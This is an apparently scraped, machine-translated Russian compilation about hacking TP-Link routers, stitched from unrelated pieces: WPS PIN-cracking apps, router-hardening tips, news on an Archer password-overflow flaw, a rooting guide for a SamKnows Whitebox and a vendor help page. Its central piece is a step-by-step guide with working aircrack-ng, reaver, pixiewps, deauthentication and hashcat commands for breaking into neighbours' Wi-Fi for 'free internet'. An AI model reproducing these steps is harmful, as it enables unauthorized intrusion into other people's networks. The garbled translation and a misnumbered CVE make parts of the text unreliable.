Взлом роутера tp link: Взлом админ панели Wi-Fi роутера | Канал о интернет безопасности

Более корректный подбор пинов выполняет программа WPSApp. Она позволяет отфильтровать все найденные точки доступа. Оставляет в списке только имеющие активный WPS и сортирует их по убыванию SNR.

Все потенциально уязвимые точки доступа в WPSApp отображаются знаком вопроса. Для них предлагается попробовать один из пяти дефолтных пин-кодов. Автор программы не стал заморачиваться со скриптом перебора и предложил сделать это вручную, зато двумя способами — с рутом и без.

Если же дефолтный пин-код заранее известен (вычисляется как производное от MAC-адреса по алгоритму ComputePIN), то такая точка доступа отмечается зеленой галочкой.

Если пин-код подошел, то ты сразу получишь пароль к Wi-Fi (WPA-PSK), каким бы сложным и длинным он ни был. Пароль можно сохранить и перейти к следующей точке доступа. Спустя какое-то время твой телефон сможет использовать Wi-Fi там, где раньше ловил только 3G/4G.

Чуть более продвинутая утилита — WiFree WPS. По сути это гибрид WPS PIN и Router Keygen. В нее зашито больше дефолтных пинов и паролей доступа к маршрутизаторам, а также есть функция их автоматического перебора. Плюс она показывает сохраненные пароли Wi-Fi и все настройки текущего подключения.

Интерфейс у программы аляповатый, но довольно информативный. Она анализирует тип защиты, производителя и уровень сигнала всех найденных точек доступа. Зеленым отображаются AP с наиболее высокой вероятностью взлома. Серым — те AP, на которых стоит перебрать 10–20 стандартных пинов, а красным — те, которые быстро вскрыть не удастся. Например, у них очень низкий уровень сигнала или вовсе отсутствует авторизация по WPS PIN. В WiFree WPS доступно два режима атаки: с рутом (требуется патч и BusyBox) и без рута (работает на Android 5.0 и выше, причем быстрее, чем в аналогичных программах).

Если в базе данных программы нет дефолтных пин-кодов для устройств данного производителя, такая точка доступа будет отображаться красным. Ты можешь попробовать подключиться к ней, вводя WPS PIN вручную. Помешать успешному взлому могут и другие факторы: низкий уровень сигнала, режим WPS-авторизации по нажатию кнопки, изменение дефолтного пина, фильтрация по MAC-адресу.

После того как ты подобрал WPS PIN и узнал пароль точки доступа, можно подключаться к ней и изучать беспроводную сеть. Для этого рекомендую использовать бесплатный набор утилит Fing — Network Tools.

Приложение имеет аккуратный и наглядный интерфейс, а все пункты меню говорят сами за себя. Например, можно просканировать точку доступа и узнать о ней массу деталей.

Затем разослать ARP-пакеты и обнаружить все подключенные хосты в этой беспроводной сети (в том числе и твой смартфон).

Посмотреть доступные сервисы и открытые порты на любом узле в этой сети.

Fing даже предлагает сразу же подключиться к любому из них, например по Telnet.

Простор для фантазии здесь открывается очень большой. Можно даже удаленно включить спящее устройство, если оно поддерживает технологию Wake-on-LAN, или устроить общую побудку широковещательным запросом WOL.

Продолжение следует…

Еще по теме: Лучшие хакерские приложения для Android

Взлом WiFi роутера — как защититься?!

За последний месяц у нескольких моих товарищей взломали домашний Вай-фай маршрутизатор. Причём сделал это не хакер-сосед, вскрывший сеть WiFi, а очень необычный вирус, пойманный в Интернете. Он создан специально для того, чтобы сделать взлом пароля роутера.
Зачем это делается? Тут всё просто. В настройках внешнего соединения WAN вручную указываются адреса DNS-серверов, да не обычных, а весьма специфических. Они перенаправляют все запросы пользователей на вредоносные веб-сайты, где с помощью хитростей и социальной инженерии выманиваются логины и пароли для платёжных систем, онлайн-банкинга и даже аккаунты социальных сетей.
Причём, на некоторых моделях, избавиться от результатов работы вируса бывает ой как не просто — приходится делать полный сброс настроек с последующей настройкой. А ведь перекрыть злоумышленникам возможность взломать роутер очень просто. Для этого надо потратить несколько минут своего времени и выполнить два очень простых совета. 

Как предотвратить взлом WiFi роутера?!

Стандарты безопасности требуют обязательно устанавливать на доступ к конфигурации маршрутизатора сложный пароль, дабы злоумышленники не могли зайти в веб-интерфейс или подключиться используя telnet или ssh.
Поэтому первым делом идём в веб-интерфейс маршрутизатора или модема и в разделе Management (Управление) ищем подраздел Admin Password (Пароль администратора).

Теперь придумываем пароль посложнее и вбиваем его в поля. Главное, после этого сами не забудьте ключевую последовательность символов. Сохраняем настройки.

Ещё один очень важный совет — старайтесь в обязательном порядке обновлять прошивку роутера до самой последней версии. Производитель, как правило, оперативно реагирует на появление уязвимостей, используемых вирусом и старается их как можно скорее устранить.
Поэтому идём на сайт производителя и скачиваем самую последнюю версию прошивки для своей модели маршрутизатора или модема.
После этого надо опять зайти в веб-интерфейс и в разделе Management (Управление) найти пункт Firmware Upgrade (Обновление программы). Он у всех марок и моделей выглядит примерно одинаково:

Нажимаем на кнопочку «Browse(Обзор)», выбираем файл скачанной прошивки и нажимаем на кнопку «Upgrade(Обновить)». После этого запуститься процесс обновления микропрограммы, который может занять от 1 до 15 минут, после чего аппарат перезагрузится.

Хотим обратить Ваше внимание, что обычно, при перепрошивке, настройки маршрутизатора не слетают, но бывают и исключения. Именно поэтому мы настоятельно рекомендуем перед тем как перепрошить роутер, обязательно сохранить его конфигурацию на компьютер.

Уязвимость в TP-Link Archer позволяет захватить контроль над устройством

Уязвимость в TP-Link Archer позволяет захватить контроль над устройством

Alexander Antipov

С помощью особо сконфигурированного запроса атакующий может обнулить пароль администратора устройства.

Компания TP-Link исправила в некоторых моделях маршрутизаторов Archer опасную уязвимость , позволяющую злоумышленникам аннулировать пароль администратора и захватить контроль над устройством по LAN через Telnet. Проблема затрагивает маршрутизаторы Archer C5 V4, Archer MR200v4, Archer MR6400v4 и Archer MR400v3.

Для эксплуатации уязвимости атакующий должен отправить HTTP-запрос со строкой, содержащей большее число символов, чем разрешенное количество байтов. В результате пароль администратора аннулируется и заменяется пустым значением. Несмотря на наличие встроенного механизма валидации, вышеописанный способ все равно работает. Дело в том, что механизм проверяет только HTTP-заголовки реферера, и с помощью вшитого значения tplinkwifi.net атакующий может заставить сервис httpd маршрутизатора принять запрос как подлинный.

Поскольку администратор обладает на устройстве правами суперпользователя, обойдя процесс аутентификации, злоумышленник автоматически получит эти права и захватит полный контроль над маршрутизатором. Он сможет не только контролировать все процессы, но также блокировать легитимным пользователям возможность авторизации в web-сервисе через пользовательский интерфейс. В таком случае жертва потеряет доступ к консоли и даже к оболочке и не сможет сменить пароль.

Даже если владельцу маршрутизатора удастся установить новый пароль, злоумышленник снова аннулирует его с помощью запроса LAN/WAN/CGI. И наконец, автоматически перестанут работать ключи RSA, поскольку шифрование не работает с пустыми паролями.

Уязвимость обнаружил исследователь IBM X-Force Red Гжегож Випич (Grzegorz Wypych). Проблеме был присвоен идентификатор CVE-2019-7405.

[100% рабочий] Как взломать TP link Wifi Password

[Pro] Как взломать пароль Wi-Fi для TP-ссылки — Взлом — В этой статье показано, как взломать сеть Wi-Fi. Обычно это ошибка, которая встречается в роутерах.

Если вы хотите стать профессиональным специалистом в области здравоохранения, то иметь полную рабочую станцию ​​для взлома — это первый этап. Хороший хакер всегда следит за тем, чтобы у него было все необходимое — от хороших и мощных периферийных устройств и программного обеспечения / инструментов. Все имеет свою важность, чтобы начать путь к профессиональному хакеру.Если вы работаете в качестве CEH в компании, то, возможно, вам придется регулярно посещать собрания Zoom, и отсутствие невнимательности может испортить впечатление в вашей команде, будь то внешний шум или ваша веб-камера низкого качества. Если вы с нетерпением ждете замены своей веб-камеры, мы хотели бы предложить вам ознакомиться с этой лучшей веб-камерой в Индии, руководство по покупке, чтобы изучить некоторые из самых продаваемых веб-камер, которые использует каждый профессионал независимо от своей профессии.
Итак, давайте без лишних слов погрузимся в руководство по взлому пароля TP Link WiFi.

Сегодня я расскажу, как взломать маршрутизатор TP Link Wi-Fi и взломать Wi-Fi пароль . В этой статье я расскажу вам простой способ получить бесплатный Wi-Fi. В основном эта восприимчивость обнаруживается в Wi-Fi маршрутизатора TP Link. В основном эта статья покажет вам, как взломать сеть Wi-Fi. Обычно это ошибка, которая встречается в маршрутизаторах компании. Вам просто нужно выполнить шаги для взлома из TP Link wifi , он автоматически подключается к Wi-Fi, и это на 100% надежный и проверенный трюк.Просто следуйте посту — Как взломать пароль Wi-Fi .

Примечание: Это сообщение только для ознакомления , и я ни за что не несу ответственности

С помощью этого трюка вы можете легко взломать пароль Wi-Fi binatone. Следуйте инструкциям ниже и используйте бесплатный Wi-Fi рядом с домом.

1. Перевести устройство в режим монитора Airmon-ng start wlan0
2. Интерфейс мониторинга будет запущен на wlan0mon
3. Используйте iwconfig, чтобы проверить , находится ли РЕЖИМ интерфейса в управляемом режиме, если да, то измените его на мониторинг вместо управляемого с помощью следующих команд:

ifconfig wlan0mon down
iwconfig wlan0mon mode monitor
ifconfig wlan0mon up

4. iwconfig check , если сейчас режим мониторинга
5. airodump-ng wlan0mon

Запустите airodump-ng , чтобы получить BSSID , MAC-адрес и канал нашей цели.

airodump-ng -i wlan0mon

Теперь выберите свою цель и используйте BSSID и канал для Reaver:

Reaver -i wlan0mon -b [BSSID] -vv -S -c [канал AP]

Нам нужны PKE, PKR, e-hash 1 & 2, E / R-nonce и ключ авторизации от Reaver для использования для pixiewps.

Теперь запустите pixiewps со следующими аргументами:

Компоненты:

– E-Hash2 — это хеш, в котором мы перебираем первую половину PIN-кода.
— E-Hash3 — это хеш, в котором мы перебираем вторую половину PIN-кода.
– HMAC — это функция, которая хеширует все данные в скобках. Это функция HMAC-SHA-256.
— PSK1 — первая половина PIN-кода маршрутизатора (10 000 вариантов)
— PSK2 — вторая половина PIN-кода маршрутизатора (1 000 или 10 000 вариантов в зависимости от того, хотим ли мы вычислить контрольную сумму. Мы просто делаем 10 000, потому что это не имеет значения разницы во времени, и это просто проще.)
— PKE — открытый ключ зарегистрированного пользователя (используется для проверки законности обмена WPS и предотвращения повторов.)
— PKR — открытый ключ регистратора (используется для проверки законности обмена WPS. и предотвратить повторы.)

Этот маршрутизатор не уязвим для Pixie Dust WPS Attack .

Попробуем взломать этот роутер с помощью Reaver. Запускаем Reaver с задержкой 5 секунд и имитируем win7 PC:

reaver -i wlan0mon -b [BSSID] -vv -c 1 -d 5 -w

Грубое форсирование маршрутизатора с помощью oclHashcat
Давайте посмотрим, сможем ли мы получить пароль путем перехвата четырехстороннего рукопожатия и автономной атаки грубой силой со списком паролей маршрутизатора по умолчанию.Мы будем использовать следующие инструменты:

1. Crunch для создания списка паролей.
2. Airodump-ng для захвата 4-стороннего рукопожатия.
3. airplay-ng для принудительного отключения подключенных клиентов.
4. oclHashcat GPU в Windows.

Давайте запустим Crunch с помощью следующей команды:

кранч 8 8 1234567890 -o /root/Desktop/88numlist.txt

Это может занять некоторое время, в результате получится список слов размером 900 МБ, содержащий все возможные комбинации из 8 цифр.Этот список слов взломает беспроводную сеть маршрутизатора TP link WR841N со 100% уверенностью.

Давайте зафиксируем рукопожатие с помощью Airodump-ng и Aireplay-ng и запустим Airodump-ng, чтобы найти нашу цель, с помощью следующей команды:

airodump-ng wlan0mon

Теперь выберите BSSID цели и канал и перезапустите Airodump-ng с помощью следующей команды и найдите подключенного клиента:

airodump-ng –bssid [BSSID] -c [канал] -w [путь к файлу для хранения.крышка] wlan0mon

Теперь деаутентифицируйте подключенного клиента, используя Aireplay-ng в новом терминале.

aireplay-ng -0 2 -a [BSSID] -c [MAC-адрес клиента] wlan0mon

Успешное деаутентификация и четырехстороннее рукопожатие зафиксировано!

Aircrack-ng aireplay-ng

Шаг 3. Bruteforce со списком паролей маршрутизатора по умолчанию
Мы будем использовать oclHashcat GPU в Windows, чтобы взломать пароль WiFi, используя список паролей, который мы создали ранее.

Сначала мы должны преобразовать файл .cap в .hccap , используя следующую команду:

aircrack-ng -J [Путь к файлу для сохранения файла .hccap] [Путь к файлу .cap]

Запустите oclHashcat в Windows, используя следующую команду:

oclhashcat64.exe -m 2500 -w 3 - [gpu-temp-keep = 60] –status -o cracked.txt tplink.hccap 88numlist.txt

Примечание: –gpu-temp-keep стоит только драм.

Так это Как взломать TP Link Wifi Password . Взломайте Tp Link и наслаждайтесь бесплатным Wi-Fi.

TP-Link Archer позволяют удаленное управление без паролей.

TP-Link устранила критическую уязвимость, затрагивающую некоторые маршрутизаторы TP-Link Archer, которая может позволить злоумышленникам войти в систему без паролей.

TP-Link устранила критическую уязвимость нулевого дня ( CVE-2017-7405 ) в своих маршрутизаторах TP-Link Archer, которая могла использоваться злоумышленниками для удаленного управления локальной сетью через соединение Telnet без аутентификации.

«Это недостаток нулевого дня, о котором ранее не сообщалось, и он может повлиять как на домашнюю, так и на бизнес-среду». — объяснил Гжегож Выпич из IBM X-Force Red (он же @ horac341). «В случае эксплуатации эта уязвимость маршрутизатора может позволить удаленному злоумышленнику взять под контроль конфигурацию маршрутизатора через Telnet в локальной сети (LAN) и подключиться к серверу протокола передачи файлов (FTP) через LAN или глобальную сеть (WAN). .”

Уязвимость может позволить неавторизованный доступ третьих лиц к маршрутизатору с правами администратора без надлежащей аутентификации.

Уязвимость может быть вызвана злоумышленником путем отправки HTTP-запроса, содержащего строку, длина которой превышает ожидаемую длину строки, в результате чего пароль полностью аннулируется и заменяется пустым значением.

Эксперт объяснил, что проверка общего интерфейса шлюза (CGI) основана только на HTTP-заголовках реферера.Это означает, что если он совпадает с IP-адресом или доменом, связанным с tplinkwifi.net , то основная служба маршрутизатора, HTTPD, распознает его как действительный.

Поскольку маршрутизаторы TP-Link Archer реализуют только тип пользователя admin с привилегиями root, а все процессы запускаются от имени root, злоумышленник может действовать как администратор и получать полный контроль над устройством.

Злоумышленники также могут заблокировать законных пользователей, которые больше не смогут войти в веб-службу устройства.

«В таком случае жертва может потерять доступ к консоли и даже к оболочке и, таким образом, не сможет восстановить новый пароль». продолжает пост. «Даже если бы существовал способ установить новый пароль, следующий уязвимый запрос LAN / WAN / CGI снова аннулировал бы пароль. Таким образом, единственный доступ будет к файлам FTP через соединение через порт USB ».

Эксперты также отметили, что ключ шифрования RSA не работает, поскольку он не предназначен для работы с пустым паролем.

«Риск выше в бизнес-сетях, где такие маршрутизаторы могут использоваться для включения гостевого Wi-Fi. Если его разместить в корпоративной сети, скомпрометированный маршрутизатор может стать точкой входа для злоумышленника и местом, откуда можно развернуться при разведке и тактике бокового перемещения ». — заключает эксперт.

TP-Link уже устранила этот недостаток, выпустив следующие исправления безопасности для маршрутизаторов Archer C5 V4, Archer MR200v4, Archer MR6400v4 и Archer MR400v3:

Прошивка для Archer C5 V4:

https: // static.tp-link.com/2019/201909/20190917/Archer_C5v4190815.rar

Лучник MR200v4:

https://static.tp-link.com/2019/201909/20190903/Archer%20MR200(EU)_V4_201

Лучник MR6400v4:

https://static.tp-link.com/2019/201908/20190826/Archer%20MR6400(EU)_V4_201

Лучник MR400v3:

https://static.tp-link.com/2019/201908/20190826/Archer%20MR400

Пьерлуиджи Паганини

( SecurityAffairs — TP-Link Archer, взлом)

Поделиться

Многочисленные незащищенные маршрутизаторы TP-Link (с именем пользователя и паролями по умолчанию), подверженные риску удаленного взлома / Digital Information World

Компании потребовалось больше года, чтобы опубликовать исправления на своем веб-сайте.

Чувствительность маршрутизаторов позволяет любому некомпетентному злоумышленнику получить полный доступ к уязвимому маршрутизатору.

Для полного использования маршрутизатора используется пароль по умолчанию.

В наихудших условиях любой угонщик может нацелить уязвимые устройства в огромных масштабах.

Они могли сделать это, взломав маршрутизаторы и прочесывая сеть с использованием паролей по умолчанию, таких как «admin» и «pass».”

В октябре 2017 года создатель британской фирмы Fidus Information Security, занимающейся кибербезопасностью, Эндрю Маббитт обнаружил эту ошибку удаленного выполнения кода и сообщил TP-Link.

В ответ, после того, как TP-Link опубликовала патч для небезопасного маршрутизатора WR940N, TP-Link была проинформирована Эндрю Маббиттом о другом маршрутизаторе WR740N в январе 2018 года.

Причина, по которой маршрутизатор WR740N уязвим для та же ошибка заключалась в том, что компания повторно использовала небезопасный код в устройствах.

По заявлению компании, оба маршрутизатора были немедленно отремонтированы, но прошивка для WR740N не была доступна на их веб-сайте при проверке.

Все подключенные устройства будут затронуты, если в маршрутизаторе будет обнаружена хотя бы одна ошибка.

По словам Эндрю Маббита, любой злоумышленник может создать хаос в сети, получив полную команду через маршрутизатор. Изменение настроек маршрутизатора влияет на всех, кто подключен к одной сети, например, изменение настроек DNS с целью обмана пользователей для кражи их учетных данных путем отправки их на поддельную страницу.

TP-Link отказалась предоставить информацию о том, сколько уязвимых маршрутизаторов было продано, но заявила, что WR740N был остановлен годом ранее, в 2017 году.

При проверке обнаруженных устройств с помощью двух поисковых систем каждая из них предположила, что их где-то между 129000 и 149 000 устройств в Интернете, хотя уязвимых устройств, вероятно, будет гораздо меньше. Бразилия, Пакистан и Болгария входят в тройку стран с наибольшим числом затронутых устройств.

Эндрю Маббитт заявил, что TP-Link несет ответственность за оповещение покупателей о том, что тысячи устройств все еще не защищены, вместо того, чтобы ждать, пока клиенты обратятся в службу технической поддержки TP-Link.

И Великобритания, и США готовы быстро потребовать от агентств продавать гаджеты с определенными паролями по умолчанию, чтобы ботнеты не перехватывали сетевые устройства в больших масштабах и не использовали общую пропускную способность интернета для отключения веб-сайтов.

Читать далее: «Почти все, что подключено к Интернету, находится под угрозой» — отчеты показывают, что популярное приложение для социальных сетей подверглось атаке

Обновите эти маршрутизаторы TP-Link, чтобы исправить критическую уязвимость пароля

Если у вас есть один из четырех маршрутизаторов TP-Link, включая TP-Link Archer C5 (v4), вы захотите найти и установить его последнюю версию прошивки обновите прямо сейчас.Патч устраняет критическую уязвимость, которая в противном случае позволила бы злоумышленнику получить полный контроль над вашим маршрутизатором — административный доступ и все остальное — и заблокировать вас.

Уязвимость, первоначально обнаруженная Гжегожем Выпичом из потрясающе звучащей хакерской группы IBM X-Force Red, похоже, требует, чтобы кто-то имел доступ к сети с по ваш маршрутизатор, чтобы начать работу. Хотя это делает это немного менее применимым, если у вас есть отличный пароль Wi-Fi (и хороший замок на входной двери), это не означает, что нет других уязвимостей, которые квалифицированный злоумышленник мог бы использовать, чтобы проникнуть в вашу сеть или отправить команды на ваш роутер.

Даже если этот взлом с большей вероятностью затронет корпоративные сети или где-либо еще, где скомпрометированный маршрутизатор может быть использован в качестве вектора для более крупной атаки, нет причин лениться и обновить прошивку вашего устройства дома. Несколько минут, потраченных на эту простую задачу, могут спасти вам мир от боли, как описывают Випич и соавтор статьи Лимор Кессем в Security Intelligence:

После получения доступа администратора без реальной аутентификации мы обнаружили, что это конкретное устройство также позволяет настраивать FTP в WAN.Кроме того, мы могли удаленно управлять маршрутизатором через безопасное соединение HTTPS, которое также уязвимо для этой атаки CGI. Воздействие и последствия этой уязвимости маршрутизатора, если она используется злонамеренной третьей стороной, могут быть пагубными.

Не только злоумышленники могут получить привилегированный доступ, но и законный пользователь может быть заблокирован и больше не сможет войти в веб-службу через пользовательский интерфейс, поскольку эта страница больше не будет принимать какие-либо пароли (без ведома пользователя). Пользователь).В таком случае жертва может потерять доступ к консоли и даже к оболочке и, таким образом, не сможет восстановить новый пароль. Даже если бы существовал способ установить новый пароль, следующий уязвимый запрос LAN / WAN / CGI снова аннулировал бы пароль. Таким образом, единственный доступ будет к файлам FTP через соединение USB-порта.

Уязвимость, которая позволяет этому случиться, необычная, но, казалось бы, простая. Атака, известная как «переполнение пароля», включает в себя подмену заголовков HTTP, чтобы они выглядели так, как будто запрос на вход поступает с IP-адреса маршрутизатора или домена, используемого маршрутизаторами TP-Link в процессе начальной настройки — tplinkwifi.сеть.

Маршрутизатор считает запрос входа в систему законным, и отправка строки пароля с запросом, который короче, чем ожидает маршрутизатор, не позволяет любому пользователю войти в систему с правильным паролем. (По сути, это атака типа «отказ в обслуживании».) Отправка более длинной строки пароля исключает ранее действующий пароль, предоставляя злоумышленнику полный незащищенный доступ к маршрутизатору.

G / O Media может получить комиссию

Обновите прошивку вашего роутера прямо сейчас

Чтобы устранить эту уязвимость, TP-Link выпустила обновления прошивки для уязвимых роутеров.Я рекомендую проверить нижнюю или заднюю часть вашего маршрутизатора, чтобы убедиться, что у вас есть (и номер его аппаратной версии, например «V4»), и загрузить обновления прямо сейчас, если у вас есть один из этих четырех маршрутизаторов:

Снимок экрана: Дэвид Мерфи

Как только вы это сделаете, откройте веб-экран конфигурации вашего маршрутизатора, войдите в систему и найдите раздел, связанный с обновлениями прошивки. Чтобы использовать C5 в качестве примера, вам нужно будет щелкнуть вкладку Advanced вверху прокрутите вниз до «Системные инструменты», и нажмите «Обновление прошивки».” Затем вы можете найти загруженное (и разархивированное) обновление прошивки и установить его на свое устройство с помощью большой кнопки« Обновить ».

Хотя было бы замечательно , если бы все маршрутизаторы могли просто пинговать сервер обновлений и автоматически загружать и устанавливать обновления прошивки для вас, это не так. Обычно ответственность за обновление маршрутизатора лежит на вас. И я это понимаю; Постоянная проверка веб-сайта на наличие обновлений прошивки — это раздражающий процесс.

На самом деле, это, вероятно, последнее, о чем вы думаете, даже если вы изрядно увлечены своим компьютером и сетевым оборудованием (как я).Чтобы исправить это, оставьте напоминание в своем любимом инструменте планирования, чтобы через три месяца повторно посетить страницу поддержки производителя маршрутизатора, чтобы проверить наличие обновлений, и установите другое напоминание в этот момент на любой период времени, который вам кажется подходящим.

hacking-the-whitebox.md · GitHub

SamKnows Whitebox — это бесплатный маршрутизатор (TP-Link TL-WDR3600), предоставляемый SamKnows для сбора статистики скорости интернета. Хорошо, это здорово, но любой человек с небольшим хакерским духом захочет взломать его, чтобы установить некоторую кастомную прошивку, чтобы воспользоваться двумя гигантскими антеннами на задней панели, портами USB и всем остальным.

Шаг 1. Режим отладки

Root-доступ может быть получен через «режим отладки» на маршрутизаторе, что дает вам прямую корневую оболочку через telnet, что удивительно просто.

• Отключите Whitebox от Интернета.
• Подключите ваш компьютер напрямую к Whitebox через Ethernet к одному из четырех портов Ethernet на Whitebox.
• Настройте параметры IP вашего компьютера на «Вручную», установив IP-адрес компьютера на 192.168.1.2 , маску подсети на 255.255.255.0 и шлюз к 192.168.1.1 .
• Выключите Белый ящик.
• Включите Белый ящик.
• Подождите, пока все индикаторы не загорятся и не погаснут, затем спамите кнопку «WPS / Reset» на задней панели Whitebox.
• Продолжайте рассылать спам, пока второй светодиод слева не начнет непрерывно мигать. Теперь вы находитесь в «режиме отладки».

Шаг 2. Изменение пароля root

Хорошо, теперь у вас есть корневая оболочка на Whitebox через telnet, не так уж и сложно.] ‘. === ВАЖНО ============================ Используйте passwd, чтобы установить пароль для входа. это отключит telnet и включит SSH —————————————— BusyBox v1.19.4 (2012-11-21 13:26:44 GMT) встроенная оболочка (ясень) Введите «help» для получения списка встроенных команд. _ ___ __ _ _ __ ___ | | ___ __ _____ _____ / __ | / _` | ‘_ `_ \ | | / / ‘_ \ / _ \ \ / \ / / __ | \ __ \ (_ | | | | | | | <| | | | (_) \ V V / \ __ \ | ___ / \ __, _ | _ | | _ | | _ | _ | \ _ \ _ | | _ | \ ___ / \ _ / \ _ / | ___ / МОНИТОРИНГ ПРОИЗВОДИТЕЛЬНОСТИ ОС: OpenWRT Attitude Adjustment, r35093 ПО: сборка WDR3600 ------------------------------------------------- корень @ (нет): / #

Вот и все, корневая оболочка busybox.Далее … монтируем файловую систему:

  корень @ (нет): / # mount_root
переход на jffs2
  

Теперь мы можем вносить изменения в систему, например, мы могли бы изменить пароль … пользователя root, возможно (они намекнули при подключении через telnet)

  корень @ (нет): / # пароль
Смена пароля для root
Новый пароль:
Неверный пароль: слишком короткий
Повторите ввод пароля:
Пароль для root изменен root
  

Я установил пароль на «root», отсюда и предупреждение «Неверный пароль».

Шаг 3: SSH внутри

Telnet — это куча дерьма, рекомендуется переход на SSH.

Теперь, если вы перезапустите коробку (не пытайтесь перезагрузить , это не так много, просто вытащите вилку), снова подключите Whitebox к маршрутизатору, тогда вы сможете получить доступ к устройству через SSH на порту. 2222 (как только вы найдете IP-адрес, назначенный DHCP, проверьте веб-интерфейс вашего маршрутизатора, чтобы узнать, можете ли вы получить список всех подключенных устройств, или попробуйте сканирование IP-адресов в локальной сети)

  $ ssh root @ 10.0,0.44 -p 2222
пароль [email protected]:

BusyBox v1.19.4 (2012-11-21 13:26:44 GMT) встроенная оболочка (ясень)
Введите «help» для получения списка встроенных команд.

                     _
 ___ __ _ _ __ ___ | | ___ __ _____ _____
/ __ | / _` | '_ `_ \ | | / / '_ \ / _ \ \ / \ / / __ |
\ __ \ (_ | | | | | | | <| | | | (_) \ V V / \ __ \
| ___ / \ __, _ | _ | | _ | | _ | _ | \ _ \ _ | | _ | \ ___ / \ _ / \ _ / | ___ /
       МОНИТОРИНГ ПРОИЗВОДИТЕЛЬНОСТИ

 ОС: OpenWRT Attitude Adjustment, r35093
 ПО: сборка WDR3600

корень @ OpenWrt: ~ #
  

Шаг 4. Изучите

Теперь вы внутри, вы можете исследовать окрестности, найти «Unit ID» вашего устройства, чтобы подделать метрики:

  корень @ OpenWrt: / tmp / samknows # cat / tmp / samknows / unitid
123456
  

Вы также можете изменить его, чтобы представить, что вы кто-то другой (Предупреждение: "unitid" возвращается к значению по умолчанию при перезагрузке) с быстрым vi / tmp / samknows / unitid

Вы также можете узнать, как все работает (например, отправлять результаты и все разные тесты) и отключить отчеты, исследуя / tmp / ispmon

  корень @ OpenWrt: ~ # cat / tmp / ispmon / cron / crontab
40 * * * * / tmp / ispmon / bin / dcsclient https: // dcs-uk.samknows.com:443 -v> / dev / null 2> & 1
45 * * * * / tmp / ispmon / scripts / pcscript> / dev / null 2> & 1
25 * * * * /tmp/ispmon/scripts/sanity.sh> / dev / null 2> & 1
26 * * * * /tmp/ispmon/scripts/submit.sh> / dev / null 2> & 1
30 * * * * /tmp/ispmon/scripts/timesync.sh> / dev / null 2> & 1
35 6 * * * /usr/sbin/udhcpcrestart.sh> / dev / null 2> & 1
38 22 * ​​* * /tmp/ispmon/scripts/background_tests.sh перезапуск> / dev / null 2> & 1
  

Показывает, какие скрипты вызываются системой и как часто.Тот же вывод можно получить с помощью crontab -e

Выполнение Cronjob можно отключить для текущего сеанса с помощью killall crond

И если вы хотите отключить что-то навсегда, взгляните на / оверлей (хорошее объяснение доступно здесь)

Шаг 4.2: Резервное копирование

Благодаря @nonflammable за это, если вы когда-нибудь захотите вернуться к исходной прошивке Samknow, вы можете сделать следующее, если не игнорировать этот шаг.

Сделайте быстрое резервное копирование системы:

dd if = / dev / mtdblock5 of = / tmp / sysbackup.bin

Скопируйте файл /tmp/sysbackup.bin в относительно безопасное место на вашем компьютере с помощью чего-нибудь вроде WinSCP или Filezilla.

Всякий раз, когда вам нужно восстановить резервную копию, вы можете использовать следующую команду:

mtd -r запись /tmp/sysbackup.bin прошивка

Или вы также можете использовать веб-интерфейс DD-WRT для загрузки и прошивки sysbackup.bin без командной строки 1337.

Самое замечательное в этом маленьком белом ящике то, что мы можем установить на него практически все, что я выбрал для установки DD-WRT. Для начала вам нужно найти правильную прошивку для Whitebox и загрузить ее на свой компьютер.

Откройте базу данных маршрутизатора DD-WRT, введите TL-WDR3600 и загрузите файл factory-to-ddwrt.bin .

Поместите файл на веб-сервер на вашем компьютере, чтобы сделать его доступным из белого ящика, чтобы маршрутизатор мог получить доступ к http: // 192.168.1.2 / factory-to-ddwrt.bin

• Теперь вернитесь к шагу 1 и войдите в Белый ящик через telnet.
• Выполните команду mount_root .
• Перейти в каталог / tmp : cd / tmp
• Выполнить wget http://192.168.1.2/factory-to-ddwrt.bin
• Выполнить mtd -r write /tmp/factory-to-ddwrt.bin прошивка

Теперь у вас должен быть следующий результат, это может занять некоторое время, не паникуйте:

  root @ (нет): / tmp # mtd -r запись / tmp / factory-to-ddwrt.bin прошивка
Разблокировка прошивки ...

Запись из /tmp/factory-to-ddwrt.bin в прошивку ...
Перезагрузка ...
  

Шаг 6. Наслаждайтесь

Теперь сеанс telnet должен умереть, и ваш Белый ящик должен перезагрузиться, я назову его теперь Черным ящиком, потому что он обращен на темную сторону.

Теперь, посетив http://192.168.1.1/ в своем браузере, вы увидите совершенно новую версию DD-WRT. Я не собираюсь подробно рассказывать о настройке, теперь это ваша проблема.Удачи со своим Blackbox!

TP-LINK / TL-WR840N: пароль

Примечание. Если вы не можете решить проблему после выполнения этих инструкций, возможно, мы сможем помочь. Получите помощь от службы поддержки RouterCheck.

Понимание проблемы «неверный пароль администратора»

Пароль администратора защищает ваш маршрутизатор от несанкционированного доступа к его функциям.Неправильно подобранный пароль позволяет хакерам по всему миру взломать ваш маршрутизатор и домашнюю сеть. Взломанные маршрутизаторы подвергают все домашние компьютеры дальнейшим атакам, что подвергает риску ваши конфиденциальные данные.

К сожалению, многие люди никогда не меняют пароль администратора своего маршрутизатора по умолчанию, что упрощает взлом хакеров. Есть даже веб-сайты, на которых вы можете найти пароль по умолчанию для любой модели маршрутизатора.Вот почему так важно использовать надежный пароль.

Если RouterCheck определил, что у вас неверный пароль администратора, это означает, что либо вы не изменили пароль по умолчанию, либо выбрали очень распространенный пароль, который легко угадать. В любом случае мы рекомендуем немедленно изменить пароль.

Каков риск не решить эту проблему?

Плохо подобранный пароль маршрутизатора всегда вызывает серьезную озабоченность.Многие люди испытывают ложное чувство безопасности, потому что считают, что их домашняя сеть недоступна хакерам через Интернет. Хотя это может быть правдой, это, конечно, не означает, что пароль администратора вашего маршрутизатора не подлежит атаке.

Хакеры обычно используют вирусы на компьютерах в домашней сети, чтобы попытаться проникнуть в маршрутизатор этой сети. Они также могут использовать атаку CSRF (подделка межсайтовых запросов), которая использует зараженные веб-страницы, чтобы воспользоваться некоторыми уязвимостями маршрутизатора.Суть в том, что пароль администратора вашего маршрутизатора очень важен, и его не следует устанавливать по умолчанию или легко угадываемое значение.

Документация поставщика

Часто бывает полезно просмотреть документацию маршрутизатора, чтобы узнать, как исправить проблемы. Перейдите на сайт поддержки поставщика, где вы можете загрузить документацию.

Как решить проблему "неверный пароль администратора"

Шаг 1. Войдите в свой роутер.

Вы используете веб-браузер для взаимодействия с маршрутизатором и устранения проблем с его конфигурацией. Однако, прежде чем вы сможете взаимодействовать с вашим браузером, вы должны войти в него. RouterCheck может дать вам подробные инструкции по входу в ваш роутер.

Шаг 2: Если вы успешно авторизуетесь, откроется домашняя страница вашего роутера.

